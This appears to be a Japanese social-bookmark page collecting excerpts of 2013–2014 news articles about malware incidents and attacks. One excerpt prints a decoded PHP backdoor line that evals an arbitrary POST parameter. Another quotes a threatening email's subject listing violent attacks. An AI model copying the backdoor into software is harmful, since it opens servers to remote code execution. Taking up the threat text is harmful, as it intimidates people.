タグ

malwareに関するtest_testerのブックマーク (20)

  • マクロを悪用した攻撃が急増 - Microsoft

    Microsoft Malware Protection Center (MMPC)は1月2日(米国時間)、「Before you enable those macros… - Microsoft Malware Protection Center - Site Home - TechNet Blogs」において、マルウェアの感染にマクロを使用する脅威が急増していると伝えた。現在、マクロはユーザーに確認を求めてから有効にするという仕組みをとっているため、マクロを使ったマルウェアの感染件数は減少している。しかし、ソーシャルエンジニアリングの手法を組み合わせることで、ユーザーに手動でマクロを有効化させるマルウェアが広がりを見せているという。 Microsoft Officeにおけるマクロはユーザーの生産性を向上させる上で重要な機能の1つだ。マクロはユーザーの処理を自動化して、日々の生産性を向上

  • 10万サイトやられた! 謎のロシア製マルウェアがWordpressで拡散中 | ライフハッカー・ジャパン

    ギズモード・ジャパンより転載:Wordpressでサイトを運用している方、ご注意! ロシア製のマルウェア、「SoakSoak」が急激に広まっています。日曜日から確認されたものだけでも、すでに約10万以上のサイトに影響が及んでいると見られ、グーグルはすでに1万1000サイトをブロックしました。 人気プラグインが原因。手動アップデートが必要 セキュリティ関連企業「Sucuri」によると、このマルウェアは、スライドショーを簡単に作れることでとても人気のあるプラグイン「Slider Revolution」の脆弱性を狙ったもので、「Slider Revolutionの開発チームは、少なくとも9月にはこの脆弱性を知っていたのにその対策を怠っていた」と指摘。 Sucuriはまた、このマルウェアの根絶はとても難しいとも指摘しています。なぜなら、Slider Revolutionはその人気のため、テーマに初

    10万サイトやられた! 謎のロシア製マルウェアがWordpressで拡散中 | ライフハッカー・ジャパン
  • 「出荷時にマルウェアが混入されていたスマホ」、Lookoutがリスト公表 | RBB TODAY

    米Lookoutは4日、スマートフォンに出荷時から混入されていた新たなマルウェア「DeathRing」に関する情報を公開した。 「DeathRing」は、中国製のトロイの木馬。主にアジア、アフリカ諸国で流通しているいくつものスマートフォンに、出荷時から仕込まれているという。着信音アプリに見せかけているが、実際は外部から不正プログラムをダウンロードし、個人情報を詐取したりする。また起動条件が特殊で、スマートフォンを5回再起動したとき、50回以上端末からスリープと復帰を繰り返したときに、動作するとみられる。 今回米Lookoutは、DeathRingの感染が確認された機種として、以下のリストを公表している。 ・偽造品のSamsung GALAXY S4/Note II ・TECNOのさまざまなデバイス ・Gionee Gpad G1 ・Gionee GN708W ・Gionee GN800 ・

    「出荷時にマルウェアが混入されていたスマホ」、Lookoutがリスト公表 | RBB TODAY
  • 中国製の電子タバコにマルウェアが仕組まれていた可能性

    By Florian F. (Flowtography) さまざまな味のフレーバーを楽しめる上に、禁煙を手助けしてくれる「リキッド式電子タバコ」は海外で人気が上昇し、日でも使用する人が増えているようです。電子タバコは専用のUSBケーブルで充電するタイプがほとんどなのですが、マルウェアに感染したPCの感染経路を調べたところ、電子タバコからUSBケーブル経由で感染した可能性が指摘されました。 The boss has malware, again... : talesfromtechsupport https://www.reddit.com/r/talesfromtechsupport/comments/2mkmlm/the_boss_has_malware_again/ Health warning: Now e-cigarettes can give you malware | Tec

    中国製の電子タバコにマルウェアが仕組まれていた可能性
  • 「ウイルスがお出迎え」、ホテル宿泊者を狙う「Darkhotel」に気を付けろ

    ロシアセキュリティベンダーであるカスペルスキー・ラボは2014年11月10日、高級ホテルのネットワークに侵入し、宿泊者のノートパソコンなどにウイルス(マルウエア)を感染させる「Darkhotel(ダークホテル)」攻撃が2010年8月から確認されているとして注意を呼びかけた。具体的なホテル名は明らかにしていないものの、日でも被害例があるもよう。 Darkhotelは、コストをかけて実行される標的型攻撃「APT」の一種。攻撃者は何らかの方法で、大手企業の幹部などが宿泊するような高級ホテルのネットワークに侵入。ホテルのポータルに罠を仕掛けて、ネットワークに接続した幹部などのパソコンにウイルスを感染させて乗っ取る。同社の報告によれば、有名な正規ソフトのインストーラーに見せかけて、ウイルスを実行させるという。 攻撃者は何らかの方法で宿泊者の詳細を入手し、情報を盗みたいような相手だった場合に、前述

    「ウイルスがお出迎え」、ホテル宿泊者を狙う「Darkhotel」に気を付けろ
  • とうとう非脱獄のiPhoneにも感染する極悪マルウェア「WireLurker」が登場

    By Erik Veland セキュリティサービス企業のPalo Alto Networksは、AppleのOS X搭載のMac経由でiPhoneiPadなどのiOS端末を感染させるマルウェア「WireLurker(ワイヤーラーカー)」が発見されたと報告書をまとめました。WireLurkerはMacに感染すると接続されるiOS端末を監視して、ユーザーに無断でiOS端末にマルウェアを送り込むとのこと。これまで、iOS端末に感染するマルウェアは、Appleがユーザー権限に課している制限を解除する行為である「Jailbreak(脱獄)」した端末に限って発見されていましたが、WireLurkerは脱獄していないiOS端末をも感染させられるとのことです。 WireLurker: A New Era in OS X and iOS Malware - Palo Alto Networks BlogP

    とうとう非脱獄のiPhoneにも感染する極悪マルウェア「WireLurker」が登場
  • はてなブックマークボタンが改ざんされマルウェア感染を媒介していた可能性について

    昨日、Chromeに突然セキュリティ警告が出た、という記事を書いたのですが、そのセキュリティ警告が出た原因をせっせとたどった結果、はてなブックマークボタンが利用するb.st-hatena.comサーバが改ざんされ、多数のサイトを、マルウェアを配布する状態にしていた形跡があったので、説明します。最初に書いておきますが、10/17現在は改ざんされていない、正規のファイルが取得できる状態です。 ※はてなから、公式発表がありました。記事の最後にその記事についてのことを追記しました。 目次 1. Chromeに出たエラー2. 経緯3. マルウェア配布サイト java-se.com へ接続するまで4. 改ざん内容5. bookmark_button.js の正体は、はてぶボタン用 JavaScript6. Googleセーフブラウジング情報の照合6.1. java-se.com6.2. b.st-ha

    はてなブックマークボタンが改ざんされマルウェア感染を媒介していた可能性について
  • 【対策追記】マイクロアド社広告経由のマルウェアについて‐ニコニコインフォ

    【6月20日 22時30分追記】※先に中段以下の経緯をご覧下さい ■ 被害状況について 今回問題が出た広告の配信元であるマイクロアド社より、 情報をご連絡いただきましたので掲載いたします。 ▽問題となったサーバーからの広告配信数(6月18日午前9時-6月19日午前11時) 233,518件 ※上記がniconico内でマイクロアド社経由の広告が表示された回数になります。 (問題の無い広告も含む) ※6月19日正午時点でマイクロアド社経由の広告は全て停止しております。 また、マイクロアド社からも件に関する追記がありましたので、ご参照下さい。 サポート窓口アドレス(support@microad.jp)などが追記されております。 ≪広告配信障害に関するプレスリリースの追記に関して≫ | MicroAd ■ 被害を受けた方へ 被害を受けてしまった方への対応方法について、 インターネットセキュリ

    【対策追記】マイクロアド社広告経由のマルウェアについて‐ニコニコインフォ
  • 「外部サービス」が原因、公式サイトの改ざん被害相次ぐ

    「外部サービス」が原因、公式サイトの改ざん被害相次ぐ:【Update】CDNetworksが侵害公表、バッファロー、JUGEMなどで改ざん 2014年5月下旬、企業サイトから公式に配布されているドライバーソフトやサイト中のJavaScriptなどが改ざんされ、オンラインバンキングを狙うマルウェアがダウンロードされてしまう事件が相次いで発生した。その原因はWebサイト運用で利用していた「外部サービス」にあるという。 2014年5月下旬、企業サイトから公式に配布されているドライバーソフトやサイト中のJavaScriptなどが改ざんされ、不正なファイルがダウンロードされてしまう事件が相次いで発生した。 この不正なファイルはAdobe Flash Playerの脆弱(ぜいじゃく)性を突くマルウェア「Infostealer.Bankeiya.B」で、オンラインバンキングの利用者を狙い、情報を盗み取ろ

    「外部サービス」が原因、公式サイトの改ざん被害相次ぐ
  • 自称真犯人からのメール(本日午前11時37分に送付されてきた) - 2014-05-16 - 弁護士 落合洋司 (東京弁護士会) の 「日々是好日」

    下記のメールに気付いたのは、今日の昼ころで、BBCの大井真理子記者のツイートで、そういうメールが来ているとのことで、もしやと思い迷惑メールボックスを見たところ入っていました。私や大井記者以外に23名、合計25名に送られていて、アドレスを見ると、ほとんどがマスコミ関係者です。前に真犯人から送られたメールの宛先と、ほぼ重複しているのではないかと思います。 差出人名は小保方銃蔵で、ヤフーメールのアドレスが使われていました。件名は、かなりえげつなくて、まずそうなところを(省略)としつつ紹介すると、 皇居にロケット砲を撃ち込んで(省略)を始末する地下鉄霞が関駅でサリン散布する(省略)裁判官と(省略)弁護士と(省略)検事​を上九一色村製AK47で射殺する(省略)病院爆破する(省略)小学校で小女子喰う(省略)を去勢して天皇制断絶(省略)の閉経マンkにVXガス注射してポアする(省略)店に牛五十頭突っ込ます

    自称真犯人からのメール(本日午前11時37分に送付されてきた) - 2014-05-16 - 弁護士 落合洋司 (東京弁護士会) の 「日々是好日」
  • 2万5000台超のLinux/*BSDサーバがマルウェア感染 - 1日3500万通のスパム送信

    ESETは3月18日(米国時間)、「Over 500,000 PCs attacked every day after 25,000 UNIX servers hijacked by Operation Windigo」において「Operation Windigo」によって25,000台を超えるLinux/*BSDサーバが乗っ取られており、結果として1日あたり3500万通のスパムメール送信に使われていると伝えた。詳細な報告書にはLinux FoundationやcPanelもこの攻撃を受けたという説明がある。ただちに管理下にあるサーバをチェックするとともに、クラッキングを受けた形跡がある場合にはシステムの再インストールとSSHパスワードの変更、秘密鍵の削除と変更などが推奨されている。 乗っ取られたWebサーバはほかのマルウェアの感染に使われたり好ましくないサイトへのリダイレクトといった行為

  • サイバースパイ攻撃「Mask」、国家が関与か

    今回は、高度で執拗な脅威(APT)とされる「Mask」についてのブログから紹介しよう。ロシアのカスペルスキーラボが解説している。同社によると、Maskは少なくとも2007年からサイバースパイ活動に使われていたという。 複雑なツールキットを使っているのが特徴で、極めて高度な種類のマルウエア、ルートキット、ブートキットなどを備えている。Windowsのほか、Mac OS XおよびLinuxに対応し、おそらくAndroidやiOS向けコンポーネントも用意している。 Maskの被害件数の分布図 カスペルスキーラボの旧来の製品に対してはカスタムな手口を使って自身を隠蔽する。巧妙さでは「Duqu」マルウエアに勝っていると、カスペルスキーラボは評価している。 Maskという名前は、作成者がマルウエアモジュールの一部に残した「Careto」(スペイン語で「マスク」の意味)という言葉に由来している。 コード

    サイバースパイ攻撃「Mask」、国家が関与か
  • Linuxサーバ2万5000台にマルウェアが感染、攻撃加担の実態も

    過去2年で2万5000台以上のサーバがLinuxを狙うマルウェアの「Ebury」に感染し、Webトラフィックのリダイレクトやマルウェアの大量送信に使われていたことが判明した。セキュリティ企業のESETが3月18日のブログで伝えた。 同社はこの攻撃を「Operation Windigo」と命名し、詳細について解説したホワイトペーパーを公表。攻撃に使われたインフラは全て、マルウェアに感染したサーバでホスティングされていたことが分かったと報告している。 EburyマルウェアはOpenSSHのログイン情報を盗む機能を持ち、Linux、FreeBSD、OpenBSD、OS X、WindowsなどのOSが影響を受ける。感染したサーバ2万5000台のうち、1万台以上はいまだにマルウェアが駆除されていないという。 ESETによれば、感染サーバは1日当たり50万ものWebビジターを悪質なコンテンツにリダイレ

    Linuxサーバ2万5000台にマルウェアが感染、攻撃加担の実態も
  • 最悪だったWeb改ざんとマルウェア感染攻撃をふりかえる・2013年まとめ

    最悪だったWeb改ざんとマルウェア感染攻撃をふりかえる・2013年まとめ:Webから降ってくる脅威(1/3 ページ) 2013年のセキュリティ動向レポートをみると、国内で大規模な影響を与えたのが「ドライブ・バイ・ダウンロード攻撃」だ。その手口や対策の課題を振り返ってみたい。 セキュリティ機関やセキュリティベンダー各社が取りまとめている2013年のセキュリティレポートが3月上旬までに相次いで発表された。国内動向をみると、多くのレポートで指摘されているのが、Webサイトの改ざんから閲覧者のコンピュータをマルウェアに感染させる「ドライブ・バイ・ダウンロード攻撃」の増加である。 ドライブ・バイ・ダウンロード攻撃は、大まかに以下のプロセスで行われる。 攻撃者がWebサイトの脆弱性を突いて不正侵入し、管理者権限などを奪取 管理者権限などを悪用して、マルウェア配布サイトに誘導するための不正コードを挿入(

    最悪だったWeb改ざんとマルウェア感染攻撃をふりかえる・2013年まとめ
  • メタデータに埋め込まれたマルウエア

    今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex

    メタデータに埋め込まれたマルウエア
  • Chromeの拡張機能Window Resizerがマルウェアを含んでいたことが発覚

    By Ian Broyles ブラウザの表示サイズをワンクリックで変更できる手軽さからWebサイト制作の現場などで役立つGoogle Chrome拡張機能「Window Resizer」のプログラム中に、キーボードの入力をトラッキングして送信するマルウェアらしきものが仕込まれていることが発覚しました。現在、「Window Resizer」はChromeウェブストアからダウンロードできなくなっています。 Malicious Chrome Extension - Google プロダクト フォーラム http://productforums.google.com/forum/#!msg/chrome/mlAD1ygc0v0/Cc7IrHdmE5AJ GoogleのフォーラムではWindow Resizerに対して「ユーザーのIDやパスワードなど個人情報を取得するもの」として議論が巻き起こって

    Chromeの拡張機能Window Resizerがマルウェアを含んでいたことが発覚
  • 巧妙化した偽セキュリティソフトにご用心! (1/2)

    これまでの連載で数多くの不正プログラムを取り上げ、旧来の不正プログラムとの比較しながら、最近の脅威の傾向を説明してきた。そのつど述べてきたことだが、最近の攻撃は、メールアドレスやID・パスワードといったPC内部の換金性が高い情報を目的としていること。それに伴い、不正プログラムの活動も画面上には見えづらく、秘匿性を増したという特徴がある。 そして、必ずセキュリティソフトの導入を勧めてきたが、すでに多くのASCII.jp読者はセキュリティソフトの必要性を重々感じていることだろう。例年9月ごろには各セキュリティソフトメーカーから新バージョンが発表されるため、読者の中にもすでに新製品を導入している方もいるかもしれない。また、各社ともこぞって新製品の無料体験版をWebサイトで公開しているので、それぞれ試して気に入ったものを購入しようという方もいるだろう。 かく言うトレンドマイクロでも、最新版の「ウイ

    巧妙化した偽セキュリティソフトにご用心! (1/2)
  • ランサムウェアとは 「身代金ウィルス, 身代金ウイルス」 (ransomware): - IT用語辞典バイナリ

    ランサムウェア 別名: 身代金ウィルス , 身代金ウイルス , 身代金型ウィルス , 身代金型ウイルス , 身代金要求ウィルス , 身代金要求ウイルス 【英】 ransomware ランサムウェアとは、マルウェア(悪意のあるソフトウェア)の一種で、ユーザーのデータを「人質」にとり、データの回復のために「身代金」(ransom)を要求するソフトウェアのことである。 ランサムウェアの多くは、トロイの木馬としてパソコン内部に侵入し、勝手にファイルを暗号化したり、パスワードを設定したりして、正常にデータにアクセスできないようにしてしまう。ユーザーがデータにアクセスしようとすると、アクセスが不可能になっていることを警告し、正常にアクセスできるよう復元する(復号鍵やパスワードを教える)ための対価として、ユーザーに金銭を支払うように要求する。 多くの場合、ランサムウェアの支払い要求に応じなければデータは

  • 新マルウェア「Ransomcrypt」に注意 - Symantec

    Symantec Official Blogの記事「Ransomcrypt: 勢いづく脅威」が、最近増加傾向にある新しいマルウェア「Ransomcrypt」を紹介している。Ransomcryptはファイルを勝手に暗号化し、復号化するには金銭が必要であると要求するマルウェア。同記事ではTrojan.Ransomcrypt.F (別名: Cryptolocker)などの例を示しながら、実施にどういった行為が行われるのかを説明している。 マルウェアRansomcryptが使用する暗号化アルゴリズムは強力であるため、暗号鍵を手に入れないかぎりは復号化が難しいとされており、さらに常に制限時間のカウントダウンが表示されるなど心理的に支払を後押しする仕組みも用意されているという。 こうしたマルウェアに対応するには、常に最新の対策ソフトウェアを導入しておくこと、ファイルのバックアップを定期的に取っておくこ

  • http://search.conduit.com/とブラウザに表示される(Search Protect)→削除方法

    これで何とかGoogleChromeも起動時に邪魔なタブが表示されなくなったのですっきりした。 追記: 公開日時: 2014年1月2日 コメントで指摘いただいた内容で最新の状態だとインストールフォルダが残っていてそれが悪さをしている場合があるらしい。 念のため コンピューターの Program Files(X86)にもSearch Protect のフォルダがありました。そこで、アンイストールを選択し、実行したところ、元に戻りました。 C:Program Files (x86) にアクセスして ”Search Protect”の名前のフォルダが無いことを確認してください。 万一有った場合はフォルダごと削除してください。 アンインストールのProgramがあればそれでを試すでも可。 この現象は、当方では未確認ですので1番コメントの情報参考です。 追記: 2014/03/06 23:11 さら

    http://search.conduit.com/とブラウザに表示される(Search Protect)→削除方法
  • 1